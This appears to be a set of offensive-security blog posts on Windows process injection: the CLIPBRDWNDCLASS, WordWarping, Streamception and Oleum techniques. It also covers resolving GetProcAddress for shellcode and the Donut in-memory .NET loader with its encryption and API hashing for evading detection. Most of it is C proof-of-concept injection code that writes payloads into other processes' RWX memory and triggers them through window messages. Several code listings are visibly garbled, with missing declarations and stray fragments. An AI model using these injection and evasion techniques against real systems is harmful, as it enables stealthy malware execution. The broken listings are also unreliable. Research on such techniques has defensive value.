## Windows Process Injection: CLIPBRDWNDCLASS

### Introduction

The Object Linking & Embedding (OLE) library (ole32.dll) uses a private clipboard. It registers `CLIPBRDWNDCLASS` as a window class, creates a window derived from that class, and assigns a number of window properties to store the address of interfaces required to process clipboard data. Hexacorn describes here how one of the properties, `ClipboardDataObjectInterface`, can be leveraged for code injection. Two other properties, `ClipboardRootDataObjectInterface` and `ClipboardDataObjectInterfaceMTA` can also be used. If `ClipboardDataObjectInterface` is set to the address of an `IUnknown` interface and the clipboard window procedure receives a `WM_DESTROYCLIPBOARD` message, it will invoke the `Release` method.

### Finding Windows

Private clipboards registered by OLE32.dll can’t be found by `EnumWindows` because they’re message-only windows. `FindWindowEx` with `HWND_MESSAGE` will find them and is used for the PoC. Another approach requires reading the `ReservedForOle` value of each Thread Environment Block in a process. `ReservedForOle` points to a SOleTlsData structure that contains a window handle for `CLIPBRDWNDCLASS`. To find private clipboards via the TEB, open a process and enumerate threads. Then perform the following steps:

### Interface

Since only the `Release` method is called by the Window procedure that retrieves a pointer to the interface, the following structure is enough.

```// fake interface
typedef struct _IUnknown_t {
// a pointer to virtual function table
ULONG_PTR lpVtbl;
// the virtual function table
ULONG_PTR QueryInterface;
ULONG_PTR Release;       // executed for WM_DESTROYCLIPBOARD
} IUnknown_t;
```

### Injection

The following code assumes a valid clipboard window already exists. There is no error checking.

```VOID clipboard(LPVOID payload, DWORD payloadSize) {
HANDLE     hp;
HWND       hw;
DWORD      id;
IUnknown_t iu;
LPVOID     cs, ds;
SIZE_T     wr;

// 1. Find a private clipboard.
//    Obtain the process id and open it
hw = FindWindowEx(HWND_MESSAGE, NULL, L"CLIPBRDWNDCLASS", NULL);
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

// 2. Allocate RWX memory in process and write payload

// 3. Allocate RW memory in process.
//    Initialize and write IUnknown interface
ds = VirtualAllocEx(hp, NULL, sizeof(IUnknown_t),
iu.lpVtbl  = (ULONG_PTR)ds + sizeof(ULONG_PTR);
iu.Release = (ULONG_PTR)cs;
WriteProcessMemory(hp, ds, &iu, sizeof(IUnknown_t), &wr);

// 4. Set the interface property and trigger execution
SetProp(hw, L"ClipboardDataObjectInterface", ds);
PostMessage(hw, WM_DESTROYCLIPBOARD, 0, 0);

// 5. Release memory for code and data
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
CloseHandle(hp);
}
```

### Summary

This method is very similar to the PROPagate technique because it uses the `SetProp` API. However, this is easier to exploit because the window procedure removes the window property after receiving `WM_DESTROYCLIPBOARD`. PoC here.

## Shellcode: Using the Exception Directory to find GetProcAddress

### Introduction

Let’s say you want the location of the `GetProcAddress` API in memory, but you can’t use the Import Address Table (IAT) or the Export Address Table (EAT). What other ways can you do it?. Perhaps there are many ways, but let me suggest one that’s relatively simple to implement and only involves searching for immediate values in the code section. When `GetProcAddress` or `GetProcAddressForCaller` cannot locate the address of a function in a dynamic library, they will return the error code STATUS_ORDINAL_NOT_FOUND. If we search in `kernelbase.dll` for this immediate value, we should land somewhere in the address range of these API. From there, we locate the entry point.

### Method 1 (32-bit)

Search the code section (`.text`) of each Dynamic-link Library (DLL) for the immediate value `0xC0000138`. If we find it, reverse the direction of search until we find the prolog bytes. For `stdcall` convention, prolog bytes normally begin with `push ebp` and `mov ebp, esp`. If the prolog contains `mov edi, edi` we can safely skip that because it’s only used for hot-patching systems after XP SP2. The following pseudo-code attempts to describe this idea.

```  func GetGPA

foreach (DLL in PEB) and addr is 0
for pos = start(DLL.text) to end(DLL.text) - 4
if pos[0] equal to STATUS_ORDINAL_NOT_FOUND
while (pos[0] not equal to prolog (push ebp, mov ebp, esp))
set pos = pos - 1
break
end if
set pos = pos + 1
end for
end for

end func
```

The following code in C demonstrates the idea.

```LPVOID GetGPA(VOID) {
PPEB                  peb;
PPEB_LDR_DATA         ldr;
PLDR_DATA_TABLE_ENTRY dte;
BYTE                  c;
DWORD                 i, j, h;
PBYTE                 cs;

ldr = (PPEB_LDR_DATA)peb->Ldr;

dte->DllBase != NULL && addr == NULL;
{
// is this kernel32.dll or kernelbase.dll?
for (h=i=0; i<dte->BaseDllName.Length/2; i++) {
c = dte->BaseDllName.Buffer[i];
h += (c | 0x20);
h = ROTR32(h, 13);
}
if (h != 0x22901A8D) continue;

if (sh[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) {
cs = RVA2VA (PBYTE, dte->DllBase, sh[i].VirtualAddress);
for(j=0; j<sh[i].Misc.VirtualSize - 4 && addr == NULL; j++) {
// is this STATUS_ORDINAL_NOT_FOUND?
if(*(DWORD*)&cs[j] == 0xC0000138) {
while(--j) {
// is this the prolog?
if(cs[j  ] == 0x55 &&
cs[j+1] == 0x8B &&
cs[j+2] == 0xEC) {
break;
}
}
}
}
}
}
}
}
```

This approach should work fine on 32-bit legacy systems, but not 64-bit systems.

### Method 2 (64-bit)

The first method doesn’t work for x64 builds because of compiler optimizations and different calling convention. `stdcall` is replaced with Microsoft `fastcall`, and chunking can break up a function over a wider address range. For 64-bit, both problems can be solved parsing the Exception Directory (`.pdata` section), which is an array of `IMAGE_RUNTIME_FUNCTION_ENTRY` structures. When an exception occurs, the dispatcher will enumerate this array until it finds the primary function associated with the address of exception, and will use the unwind information to try fix up the stack. You can find more information about x64 exception handling here.

```typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY {
} _IMAGE_RUNTIME_FUNCTION_ENTRY, *_PIMAGE_RUNTIME_FUNCTION_ENTRY;
```

The following pseudo-code attempts to describe the idea..

```  func GetGPA

foreach (DLL in PEB) and addr is 0
set start = runtime.BeginAddress + DLL.DllBase
set end   = runtime.EndAddress   + DLL.DllBase
for start to end and addr is 0
if start[0] == near conditional jump
set rva = (*(DWORD*)(start + 2) + 6 + start) - DLL.DllBase
set start2 = runtime.BeginAddress + DLL.DllBase
set end2   = runtime.EndAddress   + DLL.DllBase
for start2 to end2
if start2[0] == STATUS_ORDINAL_NOT_FOUND
break
end if
end for
end if
end foreach
end if
end for
end foreach
end foreach

end func
```

The following code has been tested on 64-bit builds of Windows 7 and Windows 10. GetGPA returned the address of `GetProcAddress` in both tests.

```LPVOID GetGPA(VOID) {
PPEB                          peb;
PPEB_LDR_DATA                 ldr;
PLDR_DATA_TABLE_ENTRY         dte;
BYTE                          c;
PIMAGE_DATA_DIRECTORY         dir;
PIMAGE_RUNTIME_FUNCTION_ENTRY rf;
DWORD                         i, j, h, rva, ba;
PBYTE                         s1, e1, s2, e2;
PUNWIND_INFO                  ui;

ldr = (PPEB_LDR_DATA)peb->Ldr;

dte->DllBase != NULL && addr == NULL;
{
// is this kernelbase.dll?
for (h=0, i=0; i<dte->BaseDllName.Length/2; i++) {
c = (BYTE)dte->BaseDllName.Buffer[i];
h += (c | 0x20);
h = ROTR32(h, 13);
}
// if not, skip it
if (h != 0x22901A8D) continue;

rf  = (PIMAGE_RUNTIME_FUNCTION_ENTRY) RVA2VA(ULONG_PTR, dte->DllBase, rva);

// if chained unwind information is specified in the next entry
ui = (PUNWIND_INFO)RVA2VA(ULONG_PTR, dte->DllBase, rf[i+1].UnwindData);

if(ui->Flags & UNW_FLAG_CHAININFO) {
// find the last entry in the chain
for(;;) {
i++;
ui = (PUNWIND_INFO)RVA2VA(ULONG_PTR, dte->DllBase, rf[i].UnwindData);
if(!(ui->Flags & UNW_FLAG_CHAININFO)) break;
}
}
// for this address range minus the length of a near conditional jump
while(s1 < (e1 - 6)) {
// is the next instruction a near conditional jump?
if(s1[0] == 0x0F && s1[1] >= 0x80 && s1[1] <= 0x8F) {
// calculate the relative virtual address of jump
rva = (DWORD)(((*(DWORD*)(s1 + 2)) + 6 + s1) - (PBYTE)dte->DllBase);
// try find the rva in exception list
// try find the error code in this address range
while(s2 < (e2 - 4)) {
// if this is STATUS_ORDINAL_NOT_FOUND
if(*(DWORD*)s2 == 0xC0000138) {
// calculate the virtual address of primary function
break;
}
s2++;
}
}
}
}
s1++;
}
}
}
}
```

Sources here.

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 3 Comments

### Introduction

The dot net Framework can be found on almost every device running Microsoft Windows. It is popular among professionals involved in both attacking (Red Team) and defending (Blue Team) a Windows-based device. In 2015, the Antimalware Scan Interface (AMSI) was integrated with various Windows components used to execute scripts (VBScript, JScript, PowerShell). Around the same time, enhanced logging or Script Block Logging was added to PowerShell that allows capturing the full contents of scripts being executed, thereby defeating any obfuscation used. To remain ahead of blue teams, red teams had to go another layer deeper into the dot net framework by using assemblies. Typically written in C#, assemblies provide red teams with all the functionality of PowerShell, but with the distinct advantage of loading and executing entirely from memory. In this post, I will briefly discuss a tool called Donut, that when given a .NET assembly, class name, method, and optional parameters, will generate a position-independent code (PIC) or shellcode that can load a .NET assembly from memory. The project was a collaborative effort between myself and TheWover who has blogged about donut here.

### Common Language Runtime (CLR) Hosting Interfaces

The CLR is the virtual machine component while the ICorRuntimeHost interface available since v1.0 of the framework (released in 2002) facilitates hosting .NET assemblies. This interface was superseded by ICLRRuntimeHost when v2.0 of the framework was released in 2006, and this was superseded by ICLRMetaHost when v4.0 of the framework was released in 2009. Although deprecated, `ICorRuntimeHost` currently provides the easiest way to load assemblies from memory. There are a variety of ways to instantiate this interface, but the most popular appears to be through one of the following:

`CorBindToRuntime` and `CorBindToRuntimeEx` functions perform the same operation, but the `CorBindToRuntimeEx` function allows us to specify the behavior of the CLR. `CLRCreateInstance` avoids having to initialize Component Object Model (COM) but is not implemented prior to v4.0 of the framework. The following code in C++ demonstrates running a dot net assembly from memory.

```#include <windows.h>
#include <oleauto.h>
#include <mscoree.h>
#include <comdef.h>

#include <cstdio>
#include <cstdint>
#include <cstring>
#include <cstdlib>
#include <sys/stat.h>

#import "mscorlib.tlb" raw_interfaces_only

void rundotnet(void *code, size_t len) {
HRESULT                  hr;
ICorRuntimeHost          *icrh;
IUnknownPtr              iu;
mscorlib::_AssemblyPtr   as;
mscorlib::_MethodInfoPtr mi;
VARIANT                  v1, v2;
SAFEARRAY                *sa;
SAFEARRAYBOUND           sab;

printf("CoCreateInstance(ICorRuntimeHost).\n");

hr = CoCreateInstance(
CLSID_CorRuntimeHost,
NULL,
CLSCTX_ALL,
IID_ICorRuntimeHost,
(LPVOID*)&icrh);

if(FAILED(hr)) return;

printf("ICorRuntimeHost::Start()\n");
hr = icrh->Start();
if(SUCCEEDED(hr)) {
printf("ICorRuntimeHost::GetDefaultDomain()\n");
hr = icrh->GetDefaultDomain(&iu);
if(SUCCEEDED(hr)) {
printf("IUnknown::QueryInterface()\n");
if(SUCCEEDED(hr)) {
sab.lLbound   = 0;
sab.cElements = len;
printf("SafeArrayCreate()\n");
sa = SafeArrayCreate(VT_UI1, 1, &sab);
if(sa != NULL) {
CopyMemory(sa->pvData, code, len);
if(SUCCEEDED(hr)) {
printf("Assembly::get_EntryPoint()\n");
hr = as->get_EntryPoint(&mi);
if(SUCCEEDED(hr)) {
v1.vt    = VT_NULL;
v1.plVal = NULL;
printf("MethodInfo::Invoke_3()\n");
hr = mi->Invoke_3(v1, NULL, &v2);
mi->Release();
}
as->Release();
}
SafeArrayDestroy(sa);
}
}
iu->Release();
}
icrh->Stop();
}
icrh->Release();
}

int main(int argc, char *argv[])
{
void *mem;
struct stat fs;
FILE *fd;

if(argc != 2) {
printf("usage: rundotnet <.NET assembly>\n");
return 0;
}

// 1. get the size of file
stat(argv[1], &fs);

if(fs.st_size == 0) {
printf("file is empty.\n");
return 0;
}

// 2. try open assembly
fd = fopen(argv[1], "rb");
if(fd == NULL) {
printf("unable to open \"%s\".\n", argv[1]);
return 0;
}
// 3. allocate memory
mem = malloc(fs.st_size);
if(mem != NULL) {
// 4. read file into memory
// 5. run the program from memory
rundotnet(mem, fs.st_size);
// 6. free memory
free(mem);
}
// 7. close assembly
fclose(fd);

return 0;
}
```

The following is a simple Hello, World! example in C# that when compiled with csc.exe will generate a dot net assembly for testing the loader.

```// A Hello World! program in C#.
using System;
namespace HelloWorld
{
class Hello
{
static void Main()
{
Console.WriteLine("Hello World!");
}
}
}
```

Compiling and running both of these sources gives the following results.

That’s a basic implementation of executing dot net assemblies and doesn’t take into consideration what runtime versions of the framework are supported. The shellcode works differently by resolving the address of `CorBindToRuntime` and `CLRCreateInstance` together which is similar to AssemblyLoader by subTee. If `CLRCreateInstance` is successfully resolved and invocation returns `E_NOTIMPL` or “Not implemented”, we execute `CorBindToRuntime` with the `pwszVersion` parameter set to NULL, which simply requests the latest version available. If we request a specific version from `CorBindToRuntime` that is not supported by the system, a host process running the shellcode might display an error message. For example, the following screenshot shows a request for v4.0.30319 on a Windows 7 machine that only supports v3.5.30729.5420.

You may be asking why the OLE functions used in the hosting example are not also used in the shellcode. OLE functions are sometimes referenced in another DLL like COMBASE instead of OLE32. xGetProcAddress can handle forward references, but for now at least, the shellcode uses a combination of `CorBindToRuntime` and `CLRCreateInstance`. `CoCreateInstance` may be used in newer versions.

### Defining .NET Types

Types are accessible from an unmanaged C++ application using the `#import` directive. The hosting example uses `_AppDomain`, `_Assembly` and `_MethodInfo` interfaces defined in `mscorlib.tlb`. The problem, however, is that there’s no definition of the interfaces anywhere in the public version of the Windows SDK. To use a dot net type from lower-level languages like assembly or C, we first have to manually define them. The type information can be enumerated using the LoadTypeLib API which returns a pointer to the ITypeLib interface. This interface will retrieve information about the library while ITypeInfo will retrieve information about the library interfaces, methods and variables. I found the open source application Olewoo useful for examining `mscorlib.tlb`. If we ignore all the concepts of Object Oriented Programming (OOP) like class, object, inheritance, encapsulation, abstraction, polymorphism..etc, an interface can be viewed from a lower-level as nothing more than a pointer to a data structure containing pointers to functions/methods. I could not find any definition of the required interfaces online except for one file in phplib that partially defines the `_AppDomain` interface. Based on that example, I created the other interfaces necessary for loading assemblies. The following method is a member of the `_AppDomain` interface.

```        HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
IType        *This,
BSTR         name,
BindingFlags invokeAttr,
IBinder      *Binder,
VARIANT      Target,
SAFEARRAY    *args,
VARIANT      *pRetVal);
```

Although no methods of the `IBinder` interface are used in the shellcode and the type could safely be changed to `void *`, the following is defined for future reference. The `DUMMY_METHOD` macro simply defines a function pointer.

```    typedef struct _Binder IBinder;

#undef DUMMY_METHOD
#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)

typedef struct _BinderVtbl {
HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
IBinder * This,
/* [in] */ REFIID riid,
/* [iid_is][out] */ void **ppvObject);

IBinder * This);

ULONG ( STDMETHODCALLTYPE *Release )(
IBinder * This);

DUMMY_METHOD(GetTypeInfoCount);
DUMMY_METHOD(GetTypeInfo);
DUMMY_METHOD(GetIDsOfNames);
DUMMY_METHOD(Invoke);
DUMMY_METHOD(ToString);
DUMMY_METHOD(Equals);
DUMMY_METHOD(GetHashCode);
DUMMY_METHOD(GetType);
DUMMY_METHOD(BindToMethod);
DUMMY_METHOD(BindToField);
DUMMY_METHOD(SelectMethod);
DUMMY_METHOD(SelectProperty);
DUMMY_METHOD(ChangeType);
DUMMY_METHOD(ReorderArgumentArray);
} BinderVtbl;

typedef struct _Binder {
BinderVtbl *lpVtbl;
} Binder;
```

### Donut Instance

The shellcode will always be combined with a block of data referred to as an Instance. This can be considered the “data segment” of the shellcode. It contains the names of DLL to load before attempting to resolve API, 64-bit hashes of API strings, COM GUIDs relevant for loading .NET assemblies into memory and decryption keys for both the Instance, and the Module if one is stored on a staging server. Many shellcodes written in C tend to store strings on the stack, but tools like FireEye Labs Obfuscated String Solver can recover them with relative ease, helping to analyze the code much faster. One advantage of keeping strings in a separate data block is when it comes to the permutation of the code. It’s possible to change the code while retaining the functionality, but never having to work with “read-only” immediate values that would complicate the process and significantly increase the size of the code. The following structure represents what is placed after a `call` opcode and before a `pop ecx / pop rcx`. The `fastcall` convention is used for both x86 and x86-64 shellcodes and this makes it convenient to load a pointer to the Instance in `ecx` or `rcx` register.

```typedef struct _DONUT_INSTANCE {
uint32_t    len;                          // total size of instance
DONUT_CRYPT key;                          // decrypts instance
// everything from here is encrypted

int         dll_cnt;                      // the number of DLL to load before resolving API
char        dll_name[DONUT_MAX_DLL][32];  // a list of DLL strings to load
uint64_t    iv;                           // the 64-bit initial value for maru hash
int         api_cnt;                      // the 64-bit hashes of API required for instance to work

union {
uint64_t  hash[48];                     // holds up to 48 api hashes
struct {
// imports from kernel32.dll
VirtualAlloc_t             VirtualAlloc;
VirtualFree_t              VirtualFree;

// imports from oleaut32.dll
SafeArrayCreate_t          SafeArrayCreate;
SafeArrayCreateVector_t    SafeArrayCreateVector;
SafeArrayPutElement_t      SafeArrayPutElement;
SafeArrayDestroy_t         SafeArrayDestroy;
SysAllocString_t           SysAllocString;
SysFreeString_t            SysFreeString;

// imports from wininet.dll
InternetCrackUrl_t         InternetCrackUrl;
InternetOpen_t             InternetOpen;
InternetConnect_t          InternetConnect;
InternetSetOption_t        InternetSetOption;
InternetCloseHandle_t      InternetCloseHandle;
HttpOpenRequest_t          HttpOpenRequest;
HttpSendRequest_t          HttpSendRequest;
HttpQueryInfo_t            HttpQueryInfo;

// imports from mscoree.dll
CorBindToRuntime_t         CorBindToRuntime;
CLRCreateInstance_t        CLRCreateInstance;
};
#endif
} api;

// GUID required to load .NET assembly
GUID xCLSID_CLRMetaHost;
GUID xIID_ICLRMetaHost;
GUID xIID_ICLRRuntimeInfo;
GUID xCLSID_CorRuntimeHost;
GUID xIID_ICorRuntimeHost;
GUID xIID_AppDomain;

DONUT_INSTANCE_TYPE type;  // PIC or URL

struct {
char url[DONUT_MAX_URL];
char req[16];            // just a buffer for "GET"
} http;

uint8_t     sig[DONUT_MAX_NAME];          // string to hash
uint64_t    mac;                          // to verify decryption ok

DONUT_CRYPT mod_key;       // used to decrypt module
uint64_t    mod_len;       // total size of module

union {
PDONUT_MODULE p;         // for URL
DONUT_MODULE  x;         // for PIC
} module;
} DONUT_INSTANCE, *PDONUT_INSTANCE;
```

### Donut Module

A dot net assembly is stored in a data structure referred to as a Module. It can be stored with an Instance or on a staging server that the shellcode will retrieve it from. Inside the module will be the assembly, class name, method, and optional parameters. The `sig` value will contain a random 8-byte string that when processed with the Maru hash function will generate a 64-bit value that should equal the value of `mac`. This is to verify decryption of the module was successful. The Module key is stored in the Instance embedded with the shellcode.

```// everything required for a module goes into the following structure
typedef struct _DONUT_MODULE {
DWORD   type;                                   // EXE or DLL
WCHAR   runtime[DONUT_MAX_NAME];                // runtime version
WCHAR   domain[DONUT_MAX_NAME];                 // domain name to use
WCHAR   cls[DONUT_MAX_NAME];                    // name of class and optional namespace
WCHAR   method[DONUT_MAX_NAME];                 // name of method to invoke
DWORD   param_cnt;                              // number of parameters to method
WCHAR   param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters passed to method
CHAR    sig[DONUT_MAX_NAME];                    // random string to verify decryption
ULONG64 mac;                                    // to verify decryption ok
DWORD   len;                                    // size of .NET assembly
BYTE    data[4];                                // .NET assembly file
} DONUT_MODULE, *PDONUT_MODULE;
```

### Random Keys

On Windows, CryptGenRandom generates cryptographically secure random values while on Linux, `/dev/urandom` is used instead of `/dev/random` because the latter blocks on read attempts. Thomas Huhn writes in Myths about /dev/urandom that `/dev/urandom` is the preferred source of cryptographic randomness on Linux. Now, I don’t suggest any of you reuse CreateRandom to generate random keys, but that’s how they’re generated in Donut.

### Random Strings

Application Domain names are generated using a random string unless specified by the user generating a payload. If a donut module is stored on a staging server, a random name is generated for that too. The function that handles this is aptly named GenRandomString. Using random bytes from `CreateRandom`, a string is derived from the letters “HMN34P67R9TWCXYF”. The selection of these letters is based on a post by trepidacious about unambiguous characters.

### Symmetric Encryption

An involution is simply a function that is its own inverse and many tools use involutions to obfuscate the code. If you’ve ever reverse engineered malware, you will no doubt be familiar with the eXclusive-OR operation that is used quite a lot because of its simplicity. A more complicated example of involutions can be the non-linear operation used for the Noekeon block cipher. Instead of involutions, Donut uses the Chaskey block cipher in Counter (CTR) mode to encrypt the module with the decryption key embedded in the shellcode. If a Donut module is recovered from a staging server, the only way to get information about what’s inside it is to recover the shellcode, find a weakness with the `CreateRandom` function or break the Chaskey cipher.

```static void chaskey(void *mk, void *p) {
uint32_t i,*w=p,*k=mk;

for(i=0;i<4;i++) w[i]^=k[i];

// apply 16 rounds of permutation
for(i=0;i<16;i++) {
w[0] += w[1],
w[1]  = ROTR32(w[1], 27) ^ w[0],
w[2] += w[3],
w[3]  = ROTR32(w[3], 24) ^ w[2],
w[2] += w[1],
w[0]  = ROTR32(w[0], 16) + w[3],
w[3]  = ROTR32(w[3], 19) ^ w[0],
w[1]  = ROTR32(w[1], 25) ^ w[2],
w[2]  = ROTR32(w[2], 16);
}
for(i=0;i<4;i++) w[i]^=k[i];
}
```

Chaskey was selected because it’s compact, simple to implement and doesn’t contain constants that would be useful in generating simple detection signatures. The main downside is that Chaskey is relatively unknown and therefore hasn’t received as much cryptanalysis as AES has. When Chaskey was first published in 2014, the recommended number of rounds was 8. In 2015, an attack against 7 of the 8 rounds was discovered showing that the number of rounds was too low of a security margin. In response to this attack, the designers proposed 12 rounds, but Donut uses the Long-term Support (LTS) version with 16 rounds.

### API Hashing

If the hash of an API string is well known in advance of a memory scan, detecting Donut would be much easier. It was suggested in Windows API hashing with block ciphers that introducing entropy into the hashing process would help code evade detection for longer. Donut uses the Maru hash function which is built atop of the Speck block cipher. It uses a Davies-Meyer construction and padding similar to what’s used in MD4 and MD5. A 64-bit Initial Value (IV) is generated randomly and used as the plaintext to encrypt while the API string is used as the key.

```static uint64_t speck(void *mk, uint64_t p) {
uint32_t k[4], i, t;
union {
uint32_t w[2];
uint64_t q;
} x;

// copy 64-bit plaintext to local buffer
x.q = p;

// copy 128-bit master key to local buffer
for(i=0;i<4;i++) k[i]=((uint32_t*)mk)[i];

for(i=0;i<27;i++) {
// donut_encrypt 64-bit plaintext
x.w[0] = (ROTR32(x.w[0], 8) + x.w[1]) ^ k[0];
x.w[1] =  ROTR32(x.w[1],29) ^ x.w[0];

// create next 32-bit subkey
t = k[3];
k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
k[0] =  ROTR32(k[0],29) ^ k[3];
k[1] = k[2]; k[2] = t;
}
// return 64-bit ciphertext
return x.q;
}
```

### Summary

Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully, that is correct. Source code can be found here.

Posted in assembly, encryption, malware, programming, security, shellcode, windows | Tagged , , , , , , | Leave a comment

## Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline

### Introduction

This is a quick response to a number of posts related to code/process injection by @hexacorn over the last week. He suggests seven new (one not so new) ways to use “shatter” style attacks for code injection/redirection. I’ll briefly discuss all of these and provide a few working examples. The first five examples work with Edit and Rich Edit controls. The last two work with `SysListView32` and `SysTreeView32`.

### Rich Edit controls

To find these, you have the option of enumerating all windows with something like `EnumWindows`, retrieving the class name from window handle and then comparing the start of the string with “RICHEDIT”. You can also find these controls manually with `FindWindow`/`FindWindowEx`. I’m working with an evaluation copy of Windows 10, so the only application I tested was Wordpad and finding the Rich Edit Control for that only required two lines of code.

```    // 1. Get main window for wordpad.

// 2. Find the rich edit control.
rew = FindWindowEx(wpw, NULL, L"RICHEDIT50W", NULL);
```

### WordWarping

A word wrapper callback function for an edit or rich edit control can be set using the `EM_SETWORDBREAKPROC` message. Simulating keyboard input via the `SendInput` or `PostMessage` APIs can trigger execution of the callback function. This method of injection was used to elevate privileges against a number of applications sixteen years ago. Although no CVE exist, it was used to exploit McAfee VirusScan, Sygate Personal Firewall Pro, WinVNC, Dameware and possibly others. The following code uses WordPad to inject code.

```VOID wordwarping(LPVOID payload, DWORD payloadSize) {
HANDLE        hp;
DWORD         id;
HWND          wpw, rew;
LPVOID        cs, wwf;
SIZE_T        rd, wr;
INPUT         ip;

// 1. Get main window for wordpad.
//    This will accept simulated keyboard input.

// 2. Find the rich edit control for wordpad.
rew = FindWindowEx(wpw, NULL, L"RICHEDIT50W", NULL);

// 3. Try get current address of Wordwrap function
wwf = (LPVOID)SendMessage(rew, EM_GETWORDBREAKPROC, 0, 0);

// 4. Obtain the process id for wordpad.

// 5. Try open the process.
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

// 6. Allocate RWX memory for the payload.

// 7. Write the payload to memory

// 8. Update the callback procedure
SendMessage(rew, EM_SETWORDBREAKPROC, 0, (LPARAM)cs);

// 9. Simulate keyboard input to trigger payload
ip.type           = INPUT_KEYBOARD;
ip.ki.wVk         = 'A';
ip.ki.wScan       = 0;
ip.ki.dwFlags     = 0;
ip.ki.time        = 0;
ip.ki.dwExtraInfo = 0;

SetForegroundWindow(rew);
SendInput(1, &ip, sizeof(ip));

// 10. Restore original Wordwrap function (if any)
SendMessage(rew, EM_SETWORDBREAKPROC, 0, (LPARAM)wwf);

// 11. Free memory and close process handle
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
CloseHandle(hp);
}
```

### Hyphentension

```typedef struct tagHyphenateInfo {
SHORT cbSize;
SHORT dxHyphenateZone;
void((WCHAR *,LANGID, long,HYPHRESULT *) * )pfnHyphenate;
} HYPHENATEINFO;
```

Information about hyphenation for a Rich Edit control can be obtained by sending the `EM_GETHYPHENATEINFO` message with a pointer to a `HYPHENATEINFO` structure. However, it assumes the pointer to structure is local memory, thus an attacker must allocate memory for the information using `VirtualAllocEx` before sending `EM_GETHYPHENATEINFO` with `SendMessage` or `PostMessage`. Before using `EM_SETHYPHENATEINFO`, it may be required to set the typography options of an edit control. Although I was unable to get this working with WordPad, I suspect it’s possible with a feature rich word processor like Microsoft Word.

### AutoCourgette

According to MSDN, the minimum supported client for the `EM_SETAUTOCORRECTPROC` message is Windows 8, so it’s a relatively new feature. WordPad obviously doesn’t support autocorrecting, so I wasn’t able to get it working. Like hyphenation, this will probably work with Microsoft Word.

### Streamception

```typedef struct _editstream {
DWORD              dwError;
EDITSTREAMCALLBACK pfnCallback;
} EDITSTREAM;
```

When a rich edit control receives the `EM_STREAMIN` message, it uses the information provided in an `EDITSTREAM` structure to transfer a stream of data into or out of the control. The `pfnCallback` field is of type `EDITSTREAMCALLBACK` and can point to a payload in memory. I made sure `EDITSTREAMCALLBACK` returns a non-zero value to indicate an error, but the contents of the rich edit control still ends up being erased. It works, but not without destruction of the existing buffer stream. There’s probably a way to solve that problem, but I didn’t investigate.

```VOID streamception(LPVOID payload, DWORD payloadSize) {
HANDLE        hp;
DWORD         id;
HWND          wpw, rew;
LPVOID        cs, ds;
SIZE_T        rd, wr;
EDITSTREAM    es;

// 1. Get window handles
rew = FindWindowEx(wpw, NULL, L"RICHEDIT50W", NULL);

// 2. Obtain the process id and try to open process
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

// 3. Allocate RWX memory and copy the payload there.

// 4. Allocate RW memory and copy the EDITSTREAM structure there.
ds = VirtualAllocEx(hp, NULL, sizeof(EDITSTREAM),

es.dwError     = 0;
es.pfnCallback = cs;

WriteProcessMemory(hp, ds, &es, sizeof(EDITSTREAM), &wr);

// 5. Trigger payload with EM_STREAMIN
SendMessage(rew, EM_STREAMIN, SF_TEXT, (LPARAM)ds);

// 6. Free memory and close process handle
VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
CloseHandle(hp);
}
```

### Oleum

After working on the first four, I started to examine the potential of `EM_SETOLECALLBACK`. It was around the same time Adam updated his blog to say he discovered this message too. The `EM_GETOLECALLBACK` message does not appear to be well documented, and when sent to the rich edit window with `SendMessage` will crash if LPARAM does not point to locally accessible memory. Moreover, `EM_GETOLECALLBACK` did not return a pointer to `IRichEditOleCallback` as expected, it returned a pointer to `IRichEditOle` instead. Because of this, I did not use `EM_SETOLECALLBACK`. Instead, the heap memory holding `IRichEditOle.lpVtbl` is overwritten with an address to a copy of the original table with one method pointing to the payload, in this case `GetClipboardData`.

We can’t overwrite the virtual function table because it resides in read-only memory. Well, perhaps you can overwrite after changing the memory protection, but I wouldn’t recommend it. Making a copy, updating one entry and simply redirecting execution through that makes more sense.

```typedef struct _IRichEditOle_t {
ULONG_PTR QueryInterface;
ULONG_PTR Release;
ULONG_PTR GetClientSite;
ULONG_PTR GetObjectCount;
ULONG_PTR GetObject;
ULONG_PTR InsertObject;
ULONG_PTR ConvertObject;
ULONG_PTR ActivateAs;
ULONG_PTR SetHostNames;
ULONG_PTR SetDvaspect;
ULONG_PTR HandsOffStorage;
ULONG_PTR SaveCompleted;
ULONG_PTR InPlaceDeactivate;
ULONG_PTR ContextSensitiveHelp;
ULONG_PTR GetClipboardData;
ULONG_PTR ImportDataObject;
} _IRichEditOle;
```

The following code uses wordpad as an example because I couldn’t find any other applications on an evaluation version of windows that used the `EM_SETOLECALLBACK` message. It replaces the address of `GetClipboardData` with address of payload and then sends `WM_COPY` to the rich edit window.

```VOID oleum(LPVOID payload, DWORD payloadSize) {
HANDLE                hp;
DWORD                 id;
HWND                  rew;
LPVOID                cs, ds, ptr, mem, tbl;
SIZE_T                rd, wr;
_IRichEditOle         reo;

// 1. Get the window handle
rew = FindWindowEx(rew, NULL, L"RICHEDIT50W", NULL);

// 2. Obtain the process id and try to open process
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

// 3. Allocate RWX memory and copy the payload there

// 4. Allocate RW memory for the current address
